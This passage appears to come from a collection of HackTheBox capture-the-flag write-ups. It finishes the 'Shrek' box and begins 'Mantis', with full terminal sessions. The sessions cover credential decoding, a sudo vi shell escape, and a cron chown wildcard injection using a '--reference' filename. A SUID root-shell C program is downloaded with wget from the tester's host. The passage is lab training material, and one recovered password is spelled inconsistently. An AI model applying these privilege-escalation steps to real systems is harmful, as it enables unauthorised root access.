4.0K drwxr-xr-x 3 nothing nothing 4.0K Aug 14 12:25 .
4.0K drwxr-xr-x 5 nothing nothing 4.0K Aug 14 11:58 ..
4.0K drwxr-xr-x 2 nothing nothing 4.0K Aug 14 12:25 10.10.10.47
4.0K -rw-r--r-- 1 nothing nothing 1.8K Aug 14 12:20 key
3.4M -rw-r--r-- 1 nothing nothing 3.3M Aug 15 2017 'Smash Mouth - All Star.mp3'
./10.10.10.47:
total 332K
4.0K drwxr-xr-x 2 nothing nothing 4.0K Aug 14 12:25 .
4.0K drwxr-xr-x 3 nothing nothing 4.0K Aug 14 12:25 ..
12K -rw-r--r-- 1 nothing nothing 9.0K Aug 14 09:01 0a935efe212d455eaba901f743e76a1f.txt
8.0K -rw-r--r-- 1 nothing nothing 7.0K Aug 14 09:01 129a5d725798449cbe35c14226c21ec8.txt
12K -rw-r--r-- 1 nothing nothing 11K Aug 14 09:01 173224a539f74d5bbd78bd097884a445.txt
16K -rw-r--r-- 1 nothing nothing 15K Aug 14 09:01 1cf72311c8394b85bee71378452a0627.txt
4.0K -rw-r--r-- 1 nothing nothing 3.0K Aug 14 09:01 2d0b3a4e22dc4043976529e9e450839d.txt
4.0K -rw-r--r-- 1 nothing nothing 3.0K Aug 14 09:01 2fdfec98b6f54a4bb2c24492804ed23e.txt
16K -rw-r--r-- 1 nothing nothing 15K Aug 14 09:01 3416a6f48fb7407e8bfa58ee7869b4c9.txt
16K -rw-r--r-- 1 nothing nothing 15K Aug 14 09:01 35ed54b85fda4c728e28d043ceff403f.txt
8.0K -rw-r--r-- 1 nothing nothing 7.0K Aug 14 09:01 3896633fd0f44d5789df5366050ecc4f.txt
16K -rw-r--r-- 1 nothing nothing 14K Aug 14 09:01 40c2e657bcc54c78be1986e9bb45886a.txt
16K -rw-r--r-- 1 nothing nothing 16K Aug 14 09:01 4328526e95f2406d8af2428b92a3afa8.txt
4.0K -rw-r--r-- 1 nothing nothing 3.0K Aug 14 09:01 549fe668212042acbcc96af1758141a4.txt
8.0K -rw-r--r-- 1 nothing nothing 6.0K Aug 14 09:01 629ac3a5efe24adaa7b5172f8bda44ca.txt
8.0K -rw-r--r-- 1 nothing nothing 8.0K Aug 14 09:01 631385a5a1ce4e46a206f0f0fbdc0808.txt
8.0K -rw-r--r-- 1 nothing nothing 6.0K Aug 14 09:01 68b211ee5513471e8b7de17661d18a9d.txt
16K -rw-r--r-- 1 nothing nothing 13K Aug 14 09:01 6aee99ecf1aa4ce78ee8d990e2c91e9a.txt
16K -rw-r--r-- 1 nothing nothing 15K Aug 14 09:01 79947ab62f1a4b959b68ada2b7849ff2.txt
8.0K -rw-r--r-- 1 nothing nothing 5.0K Aug 14 09:01 7ef381dce26a488493df64b67f3db3cf.txt
8.0K -rw-r--r-- 1 nothing nothing 5.0K Aug 14 09:01 84644e19171e425d8ac6e6e7a1398c46.txt
16K -rw-r--r-- 1 nothing nothing 15K Aug 14 09:01 9c11f948f169414cb4d3cfb607850e58.txt
8.0K -rw-r--r-- 1 nothing nothing 6.0K Aug 14 09:01 9de89e29bdb64a5eb69f1a8f344cd85a.txt
8.0K -rw-r--r-- 1 nothing nothing 5.0K Aug 14 09:01 a1127bfd922e43f0b0007b147c26e11e.txt
8.0K -rw-r--r-- 1 nothing nothing 7.0K Aug 14 09:01 a381c21f0e874439a1a634a940eaf4a9.txt
8.0K -rw-r--r-- 1 nothing nothing 7.0K Aug 14 09:01 b26e893ae4b84ca28872fc519c3803fc.txt
8.0K -rw-r--r-- 1 nothing nothing 8.0K Aug 14 09:01 b2edd39d22674696a56a7939af2ff917.txt
4.0K -rw-r--r-- 1 nothing nothing 4.0K Aug 14 09:01 bf22aa78874249a4a855995884f1daeb.txt
8.0K -rw-r--r-- 1 nothing nothing 7.5K Aug 14 09:01 d25fcf2994e14ebf990cf5b9f0b98691.txt
12K -rw-r--r-- 1 nothing nothing 12K Aug 14 09:01 dddedeb00dee439a86f7ac4c583ec700.txt
12K -rw-r--r-- 1 nothing nothing 9.0K Aug 14 09:01 e415d037bfb74c5fa6d0521ff662de8d.txt
16K -rw-r--r-- 1 nothing nothing 15K Aug 14 09:01 e5598789c60b45cf9f821e130af3b70e.txt
8.0K -rw-r--r-- 1 nothing nothing 6.0K Aug 14 09:01 f274007acbbb431185bc1fb3a1a8c5c0.txt
4.0K -rw-r--r-- 1 nothing nothing 1.8K Aug 16 2017 key
The idea here is to compare the word count of each file with the wc command:
[ 10.10.14.8/23 ] [ /dev/pts/0 ] [~/_HTB/Shrek/10.10.10.47]
→ wc *.txt
0 1 9216 0a935efe212d455eaba901f743e76a1f.txt
0 1 7168 129a5d725798449cbe35c14226c21ec8.txt
0 1 11264 173224a539f74d5bbd78bd097884a445.txt
0 1 15360 1cf72311c8394b85bee71378452a0627.txt
0 1 3072 2d0b3a4e22dc4043976529e9e450839d.txt
0 1 3072 2fdfec98b6f54a4bb2c24492804ed23e.txt
0 1 15360 3416a6f48fb7407e8bfa58ee7869b4c9.txt
0 1 15360 35ed54b85fda4c728e28d043ceff403f.txt
0 1 7168 3896633fd0f44d5789df5366050ecc4f.txt
0 1 14336 40c2e657bcc54c78be1986e9bb45886a.txt
**0 3 15390 4328526e95f2406d8af2428b92a3afa8.txt**
0 1 3072 549fe668212042acbcc96af1758141a4.txt
0 1 6144 629ac3a5efe24adaa7b5172f8bda44ca.txt
0 1 8192 631385a5a1ce4e46a206f0f0fbdc0808.txt
0 1 6144 68b211ee5513471e8b7de17661d18a9d.txt
0 1 13312 6aee99ecf1aa4ce78ee8d990e2c91e9a.txt
0 1 15360 79947ab62f1a4b959b68ada2b7849ff2.txt
0 1 5120 7ef381dce26a488493df64b67f3db3cf.txt
0 1 5120 84644e19171e425d8ac6e6e7a1398c46.txt
0 1 15360 9c11f948f169414cb4d3cfb607850e58.txt
0 1 6144 9de89e29bdb64a5eb69f1a8f344cd85a.txt
0 1 5120 a1127bfd922e43f0b0007b147c26e11e.txt
0 1 7168 a381c21f0e874439a1a634a940eaf4a9.txt
0 1 7168 b26e893ae4b84ca28872fc519c3803fc.txt
0 1 8192 b2edd39d22674696a56a7939af2ff917.txt
0 1 4096 bf22aa78874249a4a855995884f1daeb.txt
**0 3 7598 d25fcf2994e14ebf990cf5b9f0b98691.txt**
0 1 12288 dddedeb00dee439a86f7ac4c583ec700.txt
0 1 9216 e415d037bfb74c5fa6d0521ff662de8d.txt
0 1 15360 e5598789c60b45cf9f821e130af3b70e.txt
0 1 6144 f274007acbbb431185bc1fb3a1a8c5c0.txt
0 35 283084 total
Two files stand out, since they contain 3 words each instead of 1:
![](prg/4/014.png)
The second word in the first file, base64-decoded, gives us a username:
[ 10.10.14.8/23 ] [ /dev/pts/9 ] [~/_HTB/Shrek/10.10.10.47]
→ echo 'UHJpbmNlQ2hhcm1pbmc=' | base64 -d
PrinceCharming
The second file gives us binary data:
![](prg/4/015.png)
To recover the password we have to guess that this blob was encrypted with ECC, specifically the seccure scheme, and that the username we just found is the passphrase, so we install Python 3's seccure library:
[ 10.10.14.8/23 ] [ /dev/pts/9 ] [~/_HTB/Shrek/10.10.10.47]
→ sudo apt install python3-pip
[sudo] password for nothing:
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following additional packages will be installed:
python-pip-whl python3-wheel
The following NEW packages will be installed:
python-pip-whl python3-pip python3-wheel
0 upgraded, 3 newly installed, 0 to remove and 0 not upgraded.
Need to get 2,078 kB of archives.
After this operation, 3,329 kB of additional disk space will be used.
Do you want to continue? [Y/n] y
Get:1 http://archive-4.kali.org/kali kali-rolling/main amd64 python-pip-whl all 20.0.2-5kali1 [1,842 kB]
Get:2 http://archive-4.kali.org/kali kali-rolling/main amd64 python3-wheel all 0.34.2-1 [24.0 kB]
Get:3 http://archive-4.kali.org/kali kali-rolling/main amd64 python3-pip all 20.0.2-5kali1 [211 kB]
Fetched 2,078 kB in 1s (1,746 kB/s)
Selecting previously unselected package python-pip-whl.
(Reading database ... 311886 files and directories currently installed.)
Preparing to unpack .../python-pip-whl_20.0.2-5kali1_all.deb ...
Unpacking python-pip-whl (20.0.2-5kali1) ...
Selecting previously unselected package python3-wheel.
Preparing to unpack .../python3-wheel_0.34.2-1_all.deb ...
Unpacking python3-wheel (0.34.2-1) ...
Selecting previously unselected package python3-pip.
Preparing to unpack .../python3-pip_20.0.2-5kali1_all.deb ...
Unpacking python3-pip (20.0.2-5kali1) ...
Setting up python3-wheel (0.34.2-1) ...
Setting up python-pip-whl (20.0.2-5kali1) ...
Setting up python3-pip (20.0.2-5kali1) ...
Processing triggers for man-db (2.9.3-2) ...
Processing triggers for kali-menu (2020.3.2) ...
Scanning processes...
Scanning processor microcode...
Scanning linux images...
Running kernel seems to be up-to-date.
The processor microcode seems to be up-to-date.
No services need to be restarted.
No containers need to be restarted.
No user sessions are running outdated binaries.
[ 10.10.14.8/23 ] [ /dev/pts/9 ] [~/_HTB/Shrek/10.10.10.47]
→ pip3 install seccure
Collecting seccure
Downloading seccure-0.5.0.tar.gz (40 kB)
|████████████████████████████████| 40 kB 1.0 MB/s
Collecting gmpy2>=2
Downloading gmpy2-2.0.8.zip (280 kB)
|████████████████████████████████| 280 kB 2.0 MB/s
Collecting pycryptodome
Downloading pycryptodome-3.9.8-cp38-cp38-manylinux1_x86_64.whl (13.7 MB)
|████████████████████████████████| 13.7 MB 7.0 MB/s
Requirement already satisfied: six>=1.2 in /usr/lib/python3/dist-packages (from seccure) (1.15.0)
Building wheels for collected packages: seccure, gmpy2
Building wheel for seccure (setup.py) ... done
Created wheel for seccure: filename=seccure-0.5.0-py3-none-any.whl size=40750 sha256=99e3b0dbd16cb3c1eb87b2049ac5d24e70b803086078c97f634ba874f9b519b3
Then we run it like so:
python3
Python 3.8.3rc1 (default, Aug 14 2020, 11:45:56)
[GCC 9.3.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> import seccure
>>> cipher = b'\x01\xd3\xe1\xf2\x17T \xd0\x8a\xd6\xe2\xbd\x9e\x9e~P(\xf7\xe9\xa5\xc1KT\x9aI\xdd\\!\x95t\xe1\xd6p\xaa"u2\xc2\x85F\x1e\xbc\x00\xb9\x17\x97\xb8\x0b\xc5y\xec[...]'
>>> password = b'PrinceCharming'
>>> seccure.decrypt(cipher, password)
b'The password for the ssh file is: shr3k1sb3st! and you have to ssh in as: sec\n'
And there we have credentials: sec:shr3k1sb3st!, the passphrase for the encrypted key we pulled from the FTP server.
[ 10.10.14.8/23 ] [ /dev/pts/1 ] [~/HTB/Shrek]
→ cat key
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,94DC7309349E17F8ED6776ED69D6265A
[...]
-----END RSA PRIVATE KEY-----
[ 10.10.14.8/23 ] [ /dev/pts/1 ] [~/HTB/Shrek]
→ chmod 600 key
[ 10.10.14.8/23 ] [ /dev/pts/1 ] [~/HTB/Shrek]
→ ssh -i key sec@10.10.10.47
The authenticity of host '10.10.10.47 (10.10.10.47)' can't be established.
ECDSA key fingerprint is SHA256:elYdm7BTN0q3wYoaIdUyw1kBlMFTls2dWHgybMAYav8.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.47' (ECDSA) to the list of known hosts.
Enter passphrase for key 'key': shr3kisb3st!
Last login: Thu Oct 1 07:41:33 2020
[sec@shrek ~]$ id
uid=1000(sec) gid=100(users) groups=100(users),10(wheel),95(storage),98(power)
[sec@shrek ~]$ cat user.txt
d353869dc904f1f38d24fa118b397b19
And we have the user flag!
## **Part 3 : Getting Root Access**
To get root access on the box, we first privesc from the user sec to farquad:
[sec@shrek ~]$ sudo -l
User sec may run the following commands on shrek:
(farquad) NOPASSWD: /usr/bin/vi
We open vi as farquad using sudo -u:
[sec@shrek ~]$ sudo -u farquad vi
Then type in **:!bash** to drop into a shell as farquad:
[farquad@shrek sec]$ id
uid=1001(farquad) gid=100(users) groups=100(users),7(lp),10(wheel),91(video),92(audio),93(optical),95(storage)
[farquad@shrek sec]$ cd ~
[farquad@shrek ~]$ ls
mirror
[farquad@shrek ~]$ ./mirror
Mirror, Mirror on the wall who is the most handsome of all?
Of course you Lord Farquad
There we get a funny binary that mimics the mirror from the Shrek movie. One might think this is a binary exploitation challenge, but once decompiled it turns out to be a rabbit hole: it prints the message and does nothing else. The idea here was to check the cronjobs (which we can observe by running pspy), which point us to a root cronjob running every 5 minutes:
2020/08/14 08:50:19 CMD: UID=0 PID=1178 | /usr/bin/CROND -n
2020/08/14 08:50:19 CMD: UID=0 PID=1176 | /usr/bin/CROND -n
2020/08/14 08:50:19 CMD: UID=0 PID=1179 | /usr/bin/python /root/chown
2020/08/14 08:50:19 CMD: UID=0 PID=1180 | /bin/sh -c cd /usr/src; /usr/bin/chown nobody:nobody *
2020/08/14 08:50:19 CMD: UID=0 PID=1181 | /bin/sh -c cd /usr/src; /usr/bin/chown nobody:nobody *
farquad's shell is a rabbit hole in itself, so back in sec's shell we look for files modified around the timestamps we see in sec's home directory:
[sec@shrek ~]$ ls -lash
total 28K
4.0K drwx------ 3 sec users 4.0K Aug 15 2017 .
4.0K drwxr-xr-x 4 root root 4.0K Aug 11 2017 ..
0 -rw------- 1 root root 0 Aug 22 2017 .bash_history
4.0K -rw-r--r-- 1 sec users 21 Feb 14 2017 .bash_logout
4.0K -rw-r--r-- 1 sec users 57 Feb 14 2017 .bash_profile
4.0K -rw-r--r-- 1 sec users 141 Feb 14 2017 .bashrc
4.0K drwxr-xr-x 2 root root 4.0K Aug 16 2017 .ssh
4.0K -r--r--r-- 1 root root 33 Aug 22 2017 user.txt
[sec@shrek ~]$ find / -newermt 2017-08-20 ! -newermt 2017-08-24 -ls 2>/dev/null
16385 4 drwxr-xr-x 46 root root 4096 Aug 21 2017 /etc
18518 4 -rw-r--r-- 1 root root 6 Aug 23 2017 /etc/hostname
27466 4 drwxr-xr-x 5 root root 4096 Aug 23 2017 /etc/netctl
18515 4 -rw-r--r-- 1 root root 389 Aug 23 2017 /etc/netctl/static
35103 8 -rw-r--r-- 1 root root 4606 Aug 21 2017 /etc/vsftpd.conf
131506 4 drwxr-xr-x 4 root root 4096 Aug 23 2017 /etc/systemd/system
138139 4 -rw-r--r-- 1 root root 196 Aug 23 2017 /etc/systemd/system/netctl@static.service
131581 4 drwxr-xr-x 2 root root 4096 Aug 23 2017 /etc/systemd/system/multi-user.target.wants
138140 0 lrwxrwxrwx 1 root root 41 Aug 23 2017 /etc/systemd/system/multi-user.target.wants/netctl@static.service -> /etc/systemd/system/netctl@static.service
33988 4 -rw------- 1 root root 929 Aug 21 2017 /etc/shadow
33931 4 -rw-r--r-- 1 root root 968 Aug 21 2017 /etc/passwd
131255 4 drwxr-x--- 3 root root 4096 Aug 22 2017 /root
17 4 -r--r--r-- 1 root root 33 Aug 22 2017 /home/sec/user.txt
18 0 -rw------- 1 root root 0 Aug 22 2017 /home/sec/.bash_history
131595 4 drwxr-xr-x 2 root root 4096 Aug 23 2017 /var/lib/dhcpcd
138091 4 drwxr-xr-x 2 root root 4096 Aug 21 2017 /var/spool/cron
138145 4 -rw------- 1 root root 97 Aug 22 2017 /var/spool/cron/root
138108 8196 -rw-r----- 1 root systemd-journal 8388608 Aug 23 2017 /var/log/journal/84d230a047b241c6be827bd5ce531868/user-1001.journal
138101 16388 -rw-r----- 1 root systemd-journal 16777216 Aug 21 2017 /var/log/journal/84d230a047b241c6be827bd5ce531868/system@00055747c657656c-ad9ea2c5440b64ec.journal~
138138 8192 -rw-r----- 1 root systemd-journal 8388608 Aug 21 2017 /var/log/journal/84d230a047b241c6be827bd5ce531868/system@0005574ac144c200-f23de797a5b2e762.journal~
137786 16 -rw------- 1 root utmp 15744 Aug 22 2017 /var/log/btmp.1
131087 8 -rw------- 1 root root 7948 Aug 23 2017 /var/log/vsftpd.log.1
137811 264656 -rw-r--r-- 1 root root 271001726 Aug 23 2017 /var/log/httpd/access_log.1
137906 12 -rw-r--r-- 1 root root 9833 Aug 23 2017 /var/log/httpd/error_log.1
2100 4 drwxr-xr-x 2 sec root 4096 Aug 23 2017 /usr/src
20283 4 -rw-r--r-- 1 root root 91 Aug 22 2017 /usr/src/thoughts.txt
Here we are pointed towards /usr/src/thoughts.txt, and from running pspy earlier we know that a root cronjob runs **chown nobody:nobody \*** inside the /usr/src directory, so we can exploit the unquoted wildcard in that command.
[sec@shrek src]$ ls -lash
total 12K
4.0K drwxr-xr-x 2 sec root 4.0K Aug 14 10:57 .
4.0K drwxr-xr-x 8 sec root 4.0K Aug 16 2017 ..
4.0K -rw-r--r-- 1 root root 91 Aug 22 2017 thoughts.txt
The idea here is that thoughts.txt is owned by root, yet it sits in a directory owned by sec, so sec can create files next to it. We take advantage of the wildcard in the cron command like so:
[sec@shrek src]$ touch -- -reference=thoughts.txt
[sec@shrek src]$ ls -lash
total 12K
4.0K drwxr-xr-x 2 sec root 4.0K Aug 14 10:59 .
4.0K drwxr-xr-x 8 sec root 4.0K Aug 16 2017 ..
0 -rw-r--r-- 1 sec users 0 Aug 14 10:59 '-reference=thoughts.txt'
4.0K -rw-r--r-- 1 root root 91 Aug 22 2017 thoughts.txt
Now we have created a file named "--reference=thoughts.txt" (note the two leading dashes; the single-dash name created above is not parsed as that option), which the shell's wildcard expansion will pass as an argument to chown when the cronjob runs, so chown copies thoughts.txt's root ownership onto every file in the directory. Once that's done, we can drop a binary there and set its SUID bit: after the task runs and chowns the binary to root, it executes code as root, such as spawning a bash shell!
[terminal 1]
[ 10.10.14.8/23 ] [ /dev/pts/12 ] [~/HTB/Shrek]
→ vim nihilist.c
[ 10.10.14.8/23 ] [ /dev/pts/12 ] [~/HTB/Shrek]
→ cat nihilist.c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main(int argc, char *argv[])
{
    /* Once the root cronjob has chowned this SUID binary to root,
     * the effective uid is 0; make the real uid 0 too and spawn bash. */
    setreuid(0, 0);
    char *args[] = {"/usr/bin/bash", NULL};
    execve("/usr/bin/bash", args, NULL);
    return 1; /* only reached if execve failed */
}
[ 10.10.14.8/23 ] [ /dev/pts/12 ] [~/HTB/Shrek]
→ gcc nihilist.c -o privesc
[ 10.10.14.8/23 ] [ /dev/pts/12 ] [~/HTB/Shrek]
→ ls -lash
total 36K
4.0K drwxr-xr-x 2 nothing nothing 4.0K Jul 7 13:06 .
4.0K drwxr-xr-x 9 nothing nothing 4.0K Jul 7 12:36 ..
4.0K -rw-r--r-- 1 nothing nothing 153 Jul 7 13:06 nihilist.c
4.0K -rw------- 1 nothing nothing 1.8K Jul 7 12:39 key
20K -rwxr-xr-x 1 nothing nothing 17K Jul 7 13:06 privesc
[ 10.10.14.8/23 ] [ /dev/pts/12 ] [~/HTB/Shrek]
→ python3 -m http.server 9090
Serving HTTP on 0.0.0.0 port 9090 (http://0.0.0.0:9090/) ...
[terminal 2]
Now that that's done, we fetch the binary onto the box, set its SUID bit, recreate the option-named file and wait for the cronjob to run:
[sec@shrek ~]$ cd /usr/src/
[sec@shrek src]$ ls -lash
total 12K
4.0K drwxr-xr-x 2 sec root 4.0K Aug 23 2017 .
4.0K drwxr-xr-x 8 sec root 4.0K Oct 1 2020 ..
4.0K -rw-r--r-- 1 root root 91 Aug 22 2017 thoughts.txt
[sec@shrek src]$ wget http://10.10.14.8:9090/privesc
--2021-07-07 11:00:19-- http://10.10.14.8:9090/privesc
Connecting to 10.10.14.8:9090... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16656 (16K) [application/octet-stream]
Saving to: privesc
privesc 100%[======================================================================================================================================================================================>] 16.27K 35.8KB/s in 0.5s
2021-07-07 11:00:20 (35.8 KB/s) - privesc saved [16656/16656]
[sec@shrek src]$ chmod 4755 privesc
[sec@shrek src]$ touch -- --reference=thoughts.txt
[sec@shrek src]$ ls -lash
total 32K
4.0K drwxr-xr-x 2 sec root 4.0K Jul 7 11:00 .
4.0K drwxr-xr-x 8 sec root 4.0K Oct 1 2020 ..
20K -rwsr-xr-x 1 sec users 17K Jul 7 10:48 privesc
0 -rw-r--r-- 1 sec users 0 Jul 7 11:00 '--reference=thoughts.txt'
4.0K -rw-r--r-- 1 root root 91 Aug 22 2017 thoughts.txt
[sec@shrek src]$ date
Wed Jul 7 11:01:26 UTC 2021
[sec@shrek src]$ date
Wed Jul 7 11:20:55 UTC 2021
[sec@shrek src]$ ls -lash privesc
20K -rwsr-sr-x 1 root root 17K Jul 7 11:06 privesc
[sec@shrek src]$ ./privesc
bash-4.4# id
uid=0(root) gid=100(users) groups=100(users),10(wheel),95(storage),98(power)
bash-4.4# cat /root/root.txt
27XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
And that's it! We managed to privesc to the root user and get the root flag.
## **Conclusion**
Here we can see the progress graph :
![](img/4_graph.png)
330
Hard/5.md Normal file
@ -0,0 +1,330 @@
# Mantis Writeup
![](img/5.png)
## Introduction :
Mantis is a hard windows box released back in September 2017.
## **Part 1 : Initial Enumeration**
As always we start with nmap to scan for open ports, using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
[ 10.10.14.17/23 ] [ /dev/pts/3 ] [~]
→ nmap -sCV 10.10.10.52
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-25 17:06 BST
Nmap scan report for 10.10.10.52
Host is up (0.57s latency).
Not shown: 984 closed ports
PORT STATE SERVICE VERSION
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-08-25 14:10:56Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2008 R2 Standard 7601 Service Pack 1 microsoft-ds (workgroup: HTB)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
Service Info: Host: MANTIS; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -36m00s, deviation: 2h18m34s, median: -1h56m01s
| smb-os-discovery:
| OS: Windows Server 2008 R2 Standard 7601 Service Pack 1 (Windows Server 2008 R2 Standard 6.1)
| OS CPE: cpe:/o:microsoft:windows_server_2008::sp1
| Computer name: mantis
| NetBIOS computer name: MANTIS\x00
| Domain name: htb.local
| Forest name: htb.local
| FQDN: mantis.htb.local
|_ System time: 2020-08-25T10:11:51-04:00
| smb-security-mode:
| account_used: <****blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2020-08-25T14:11:53
|_ start_date: 2020-08-25T14:10:13
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 191.16 seconds
## **Part 2 : Getting User Access**
This box is one example of a machine with a lot of open ports, and yet the default scan is not enough: you need to enumerate every port on this machine using nmap's -p- flag:
[ 10.10.14.7/23 ] [ /dev/pts/8 ] [~]
→ nmap -p- 10.10.10.52
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-02 19:57 GMT
Nmap scan report for 10.10.10.52
Host is up (0.037s latency).
Not shown: 65509 closed ports
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
**1337/tcp open waste**
1433/tcp open ms-sql-s
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5722/tcp open msdfsr
8080/tcp open http-proxy
9389/tcp open adws
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49157/tcp open unknown
49158/tcp open unknown
49172/tcp open unknown
50255/tcp open unknown
57110/tcp open unknown
57114/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 32.05 seconds
And here we see the port we missed earlier, 1337:
![](prg/5/1.png)
So let's enumerate it with gobuster and a wordlist from seclists:
[ 10.10.14.7/23 ] [ /dev/pts/7 ] [~]
→ sudo apt install seclists gobuster -y
[ 10.10.14.7/23 ] [ /dev/pts/6 ] [~]
→ gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://10.10.10.52:1337/
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.10.52:1337/
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2021/01/02 20:09:19 Starting gobuster
===============================================================
/secure_notes (Status: 301)
Progress: 145379 / 220561 (65.91%)^C
[!] Keyboard interrupt detected, terminating.
===============================================================
2021/01/02 20:18:25 Finished
===============================================================
And here we found the /secure_notes directory:
![](prg/5/2.png)
Let's see what's in dev_notes_NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx.txt.txt:
[ 10.10.14.7/23 ] [ /dev/pts/7 ] [~]
→ curl http://10.10.10.52:1337/secure_notes/dev_notes_NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx.txt.txt
1. Download OrchardCMS
2. Download SQL server 2014 Express ,create user "admin",and create orcharddb database
3. Launch IIS and add new website and point to Orchard CMS folder location.
4. Launch browser and navigate to http://localhost:8080
5. Set admin password and configure sQL server connection string.
6. Add blog pages with admin user.
Credentials stored in secure format
OrchardCMS admin creadentials 010000000110010001101101001000010110111001011111010100000100000001110011011100110101011100110000011100100110010000100001
SQL Server sa credentials file namez%
Now there is a bit to unpack here. First, the base64 string in the note's filename:
[ 10.10.14.7/23 ] [ /dev/pts/7 ] [~]
→ echo NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx | base64 -d
6d2424716c5f53405f504073735730726421
This gives us a hex string, so we convert it back to ASCII:
[ 10.10.14.7/23 ] [ /dev/pts/7 ] [~]
→ echo 6d2424716c5f53405f504073735730726421 | xxd -r -p
m$$ql_S@_P@ssW0rd!
And here we have the SQL Server sa password. The binary string in the note, decoded as 8-bit ASCII, gives the OrchardCMS admin password, so we end up with:
@dm!n_P@ssW0rd!
m$$ql_S@_P@ssW0rd!
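As an added example (not part of the original writeup), here is the full decoding of both values from the dev note in Python, including the binary-to-ASCII step the terminal session above skips. The two encoded strings are the ones from the note; the function names are illustrative.

```python
import base64
import binascii

# Both values are copied verbatim from dev_notes_*.txt.txt found on Mantis.
NOTE_NAME_B64 = "NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx"
ADMIN_BITS = (
    "0100000001100100011011010010000101101110010111110101000001000000"
    "01110011011100110101011100110000011100100110010000100001"
)


def decode_note_name(b64_token: str) -> str:
    """Undo the two-layer encoding of the filename: base64 -> hex digits -> ASCII.

    Mirrors `base64 -d | xxd -r -p`, but fails loudly if the intermediate is
    not hex, so a wrong guess about the layering does not silently yield junk.
    """
    hex_digits = base64.b64decode(b64_token, validate=True).decode("ascii")
    if len(hex_digits) % 2 or any(c not in "0123456789abcdefABCDEF" for c in hex_digits):
        raise ValueError(f"intermediate layer is not a hex string: {hex_digits!r}")
    return binascii.unhexlify(hex_digits).decode("ascii")


def decode_bit_string(bits: str) -> str:
    """Decode a run of '0'/'1' characters as 8-bit ASCII, one character per octet."""
    if len(bits) % 8:
        raise ValueError(f"bit string length {len(bits)} is not a multiple of 8")
    if set(bits) - {"0", "1"}:
        raise ValueError("bit string contains characters other than 0 and 1")
    return "".join(chr(int(bits[i:i + 8], 2)) for i in range(0, len(bits), 8))


def decode_credentials() -> dict:
    """Return both passwords the note leaks, keyed by the account they belong to."""
    return {
        "sa_password": decode_note_name(NOTE_NAME_B64),
        "orchard_admin_password": decode_bit_string(ADMIN_BITS),
    }


if __name__ == "__main__":
    for account, secret in decode_credentials().items():
        print(f"{account}: {secret}")
```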
The next part of this box is the blog on port 8080:
![](prg/5/3.png)
[ 10.10.14.7/23 ] [ /dev/pts/9 ] [~]
→ curl 10.10.10.52:8080 2>/dev/null | grep Powered
Powered by [Orchard](http://www.orchardproject.net) (C) The Theme Machine 2021.
Let's try to find the administrator page of this Orchard website using gobuster:
[ 10.10.14.7/23 ] [ /dev/pts/9 ] [~]
→ gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://10.10.10.52:8080
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.10.52:8080
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2021/01/02 20:47:55 Starting gobuster
===============================================================
/archive (Status: 200)
/blogs (Status: 200)
**/admin (Status: 302)**
/tags (Status: 200)
/Archive (Status: 200)
/pollArchive (Status: 200)
/Blogs (Status: 200)
/newsarchive (Status: 200)
/news_archive (Status: 200)
Let's log in to the /admin page with the credentials (admin:@dm!n_P@ssW0rd!) we found earlier:
